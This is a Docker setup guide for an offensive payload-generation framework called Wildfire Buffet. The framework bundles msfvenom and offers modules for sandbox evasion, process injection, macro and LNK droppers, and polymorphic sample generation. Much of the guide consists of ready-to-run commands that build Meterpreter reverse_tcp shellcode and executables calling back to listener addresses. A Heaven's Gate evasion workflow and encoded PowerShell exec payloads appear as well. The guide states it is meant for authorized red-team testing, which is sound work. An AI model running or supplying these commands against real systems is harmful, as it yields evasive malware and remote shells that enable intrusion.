# Wildfire Buffet - Docker Guide

This guide explains how to build and run Wildfire Buffet CLI using Docker with Windows containers.

## Prerequisites

- **Docker Desktop** with Windows containers enabled
- **Windows 10/11 Pro, Enterprise, or Education** (required for Windows containers)
- **At least 20GB free disk space** (for base images and build tools)

### Enable Windows Containers

1. Install [Docker Desktop](https://www.docker.com/products/docker-desktop/)
2. Right-click Docker Desktop system tray icon
3. Select "Switch to Windows containers..."
4. Wait for Docker to restart

## Building the Docker Image

The Docker image includes:
- .NET 8 SDK
- Visual Studio Build Tools with C++ workload (for Native AOT)
- Wildfire Buffet CLI compiled as Native AOT executable
- All modules, execution types, packagers, and recipes
- **Metasploit Framework** (includes msfvenom for shellcode generation)

### Build Command

```powershell
# Build the Docker image (takes 15-20 minutes first time)
docker build -t wildfire-buffet-cli:latest .
```

**Note**: The first build will take significant time as it downloads and installs Visual Studio Build Tools (~7GB).

## Running the Container

The container uses a smart entrypoint wrapper that routes commands to either **WildfireBuffet CLI** (default) or **msfvenom**.

### WildfireBuffet CLI (Default)

#### Show Help
```powershell
docker run --rm wildfire-buffet-cli:latest --help
```

#### Interactive Mode
```powershell
docker run --rm -it wildfire-buffet-cli:latest --interactive
```

#### Build from Recipe
```powershell
# Mount output directory to access generated files
docker run --rm -v ${PWD}/output:/wildfire-buffet/output wildfire-buffet-cli:latest --config Recipes/native-exe-dynamic-import.json
```

### Using msfvenom (Shellcode Generation)

The Docker image includes Metasploit Framework for shellcode generation. Use the `msfvenom` prefix or `-m` flag:

#### Check msfvenom Version
```powershell
docker run --rm wildfire-buffet-cli:latest msfvenom --version
```

#### List Available Payloads
```powershell
docker run --rm wildfire-buffet-cli:latest msfvenom --list payloads
```

#### Generate Shellcode
```powershell
# Generate raw shellcode
docker run --rm -v ${PWD}/output:/output wildfire-buffet-cli:latest msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o /output/shellcode.bin

# Generate executable payload
docker run --rm -v ${PWD}/output:/output wildfire-buffet-cli:latest msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /output/payload.exe

# Using short flag (-m)
docker run --rm wildfire-buffet-cli:latest -m --list formats
```

#### Common msfvenom Use Cases

**Generate C-style shellcode for Heaven's Gate module:**
```powershell
docker run --rm -v ${PWD}/Shellcode:/output wildfire-buffet-cli:latest msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f c -o /output/payload64.c
```

**Generate Python-style shellcode:**
```powershell
docker run --rm -v ${PWD}/output:/output wildfire-buffet-cli:latest msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f python -o /output/shellcode.py
```

**List all available formats:**
```powershell
docker run --rm wildfire-buffet-cli:latest msfvenom --help-formats
```

### Using Docker Compose

#### WildfireBuffet CLI
```powershell
# Build image
docker-compose build

# Run with help
docker-compose run --rm wildfire-buffet-cli --help

# Interactive mode
docker-compose run --rm wildfire-buffet-cli --interactive

# Build from recipe
docker-compose run --rm wildfire-buffet-cli --config Recipes/native-exe-evasive.json

# Access generated files in ./output/ on host
```

#### msfvenom via Docker Compose
```powershell
# Generate shellcode with docker-compose
docker-compose run --rm wildfire-buffet-cli msfvenom -p windows/x64/exec CMD=calc.exe -f c

# List payloads
docker-compose run --rm wildfire-buffet-cli msfvenom --list payloads | grep windows

# Using short flag
docker-compose run --rm wildfire-buffet-cli -m --help-formats
```

## Volume Mounts

The docker-compose.yml includes two volume mounts:

1. **Output Directory**: `./output` → `/wildfire-buffet/output`
   - Generated payloads are saved to your host machine
   - Accessible in the `output/` folder on the host
   - **All recipes use this single output directory** for consistency

2. **Recipes Directory** (read-only): `./Recipes` → `/wildfire-buffet/Recipes:ro`
   - Use custom recipes from your host machine
   - Modify recipes without rebuilding the image

**Example with explicit paths:**
```powershell
# Using current directory
docker run --rm -v ${PWD}/output:/wildfire-buffet/output wildfire-buffet-cli:latest --config Recipes/test.json

# Using absolute path
docker run --rm -v "C:/Projects/wildfire-buffet/output:/wildfire-buffet/output" wildfire-buffet-cli:latest --config Recipes/test.json
```

## Customizing the Build

### Using Custom Modules

To include custom modules, place them in the appropriate directories before building:
- `Modules/Evasions/` - Evasion modules
- `Modules/Actions/` - Action modules
- `ExecutionTypes/` - Execution type generators
- `Packagers/` - Output packagers

Then rebuild the image:
```powershell
docker build -t wildfire-buffet-cli:latest .
```

### Build Arguments

You can customize the build with arguments:

```dockerfile
# Example: Use a different base image
docker build --build-arg BASE_IMAGE=mcr.microsoft.com/dotnet/sdk:8.0-nanoserver-ltsc2022 -t wildfire-buffet-cli:latest .
```

## Features

### Native AOT Compilation

The Docker image builds WildfireBuffet CLI using Native AOT compilation, which provides:

- **Smaller binaries**: ~8MB vs ~33MB for self-contained builds
- **Faster startup**: No JIT compilation needed
- **No .NET runtime dependency**: Runs on any Windows Server Core machine
- **JSON source generators**: Full support for recipe loading and configuration with source-generated serialization

### Module Discovery

The Docker image includes all modules from the `Modules/` directory:

- **Evasion modules**: VM detection, anti-debugging, sandbox detection
- **Action modules**: Network operations, process injection, registry manipulation
- **PDF modules**: Document generation with links, JavaScript, images
- **LNK modules**: Shortcut creation and configuration
- **PowerShell modules**: Script generation with web requests
- **Excel modules**: VBA macro generation

All modules load successfully at runtime and are available in interactive mode.

### Recipe Support

Full support for JSON recipe files:

- Load recipes from `Recipes/` directory
- Configure module parameters via JSON
- Specify execution types (native-exe, PDF, LNK, PowerShell, Excel)
- Apply packagers (ZIP, ISO)
- Generate multiple polymorphic samples from a single recipe

Example recipe usage:
```powershell
docker-compose run --rm wildfire-buffet-cli --config Recipes/native-exe-evasive.json
```

### Metasploit Framework Integration

The Docker image includes Metasploit Framework (msfvenom) for shellcode generation:

- **Generate shellcode**: Create custom payloads in various formats (raw, C, Python, etc.)
- **Multiple architectures**: Support for x86, x64, and cross-platform payloads
- **Integration with modules**: Use msfvenom output directly in WildfireBuffet modules
- **No separate installation**: Everything bundled in the Docker image

Access msfvenom via the container:
```powershell
# List available payloads
docker run --rm wildfire-buffet-cli:latest msfvenom --list payloads

# Generate shellcode
docker run --rm wildfire-buffet-cli:latest msfvenom -p windows/x64/exec CMD=calc.exe -f c
```

### Configuration Management

The Docker container supports the full configuration system:

- **wildfire-config.json**: Automatic loading of framework configuration
- **Custom paths**: Configure module, recipe, and output directories
- **Recipe templates**: Pre-configured build templates in `Recipes/` directory
- **Parameter substitution**: Full support for module parameter configuration
- **Polymorphic generation**: Each build produces unique samples with different hashes

## Troubleshooting

### Docker Not Using Windows Containers

**Error**: `image operating system "windows" cannot be used on this platform`

**Solution**: Right-click Docker Desktop → "Switch to Windows containers..."

### Build Fails During VS Build Tools Installation

**Error**: Visual Studio installer fails

**Solutions**:
1. Increase Docker memory limit (Settings → Resources → Advanced)
2. Ensure stable internet connection
3. Try building again (installer download may have been interrupted)

### Container Runs But No Output Files

**Issue**: Files generated in container but not on host

**Solution**: Ensure volume mount is correct:
```powershell
# Use absolute path
docker run --rm -v "C:/path/to/output:/wildfire-buffet/output" wildfire-buffet-cli:latest --config Recipes/test.json

# Or use ${PWD} for current directory
docker run --rm -v "${PWD}/output:/wildfire-buffet/output" wildfire-buffet-cli:latest --config Recipes/test.json
```

## Image Size

The final image is approximately:
- **Build stage**: ~15-20 GB (includes SDK and build tools)
- **Runtime stage**: ~5-6 GB (Windows Server Core + compiled executable + Metasploit Framework)

To reduce size, the multi-stage build separates compilation (with build tools) from runtime (smaller base).

**Note**: Metasploit Framework adds approximately 1-2 GB to the runtime image.

## Updating the Image

After modifying source code or modules:

```powershell
# Rebuild image
docker build -t wildfire-buffet-cli:latest .

# Or with docker-compose
docker-compose build
```

## Security Notes

- This tool is for **authorized security testing only**
- The Docker image contains payload generation tools
- **Do not** push this image to public registries
- Use in **isolated/controlled environments only**

## Performance

Native AOT compilation inside Docker:
- **First build**: 15-20 minutes (downloads and installs build tools)
- **Subsequent builds**: 5-10 minutes (cached layers)
- **Runtime**: Fast startup, native executable performance

## Example Workflows

### Workflow 1: Generate Payloads with WildfireBuffet

```powershell
# 1. Build the Docker image (one-time setup)
docker-compose build

# 2. Test with help command
docker-compose run --rm wildfire-buffet-cli --help

# 3. Generate payloads from recipe
docker-compose run --rm wildfire-buffet-cli --config Recipes/native-exe-evasive.json

# 4. Check output on host
ls output/

# 5. Interactive mode for custom builds
docker-compose run --rm wildfire-buffet-cli --interactive
```

### Workflow 2: Generate Shellcode with msfvenom

```powershell
# 1. Generate shellcode for Heaven's Gate module
docker-compose run --rm wildfire-buffet-cli msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f c -o /wildfire-buffet/Shellcode/payload64.c

# 2. Generate 32-bit shellcode
docker-compose run --rm wildfire-buffet-cli msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f c -o /wildfire-buffet/Shellcode/payload32.c

# 3. Use generated shellcode in Heaven's Gate recipe
docker-compose run --rm wildfire-buffet-cli --config Recipes/native-exe-heavens-gate.json

# 4. Check generated payloads
ls output/
```

### Workflow 3: Combined Approach

```powershell
# 1. Generate custom shellcode with msfvenom
docker run --rm -v ${PWD}/Shellcode:/shellcode wildfire-buffet-cli:latest msfvenom -p windows/x64/exec CMD="powershell -enc <BASE64>" -f c -o /shellcode/custom.c

# 2. Update Heaven's Gate module to use custom shellcode
# (Edit Modules/Evasions/HeavensGate.cs to reference Shellcode/custom.c)

# 3. Build payload with custom shellcode
docker-compose run --rm wildfire-buffet-cli --config Recipes/native-exe-heavens-gate.json

# 4. Verify output
ls output/
```

## Author

ril3y

## License

For authorized security testing, educational contexts, CTF challenges, and defensive security use only.
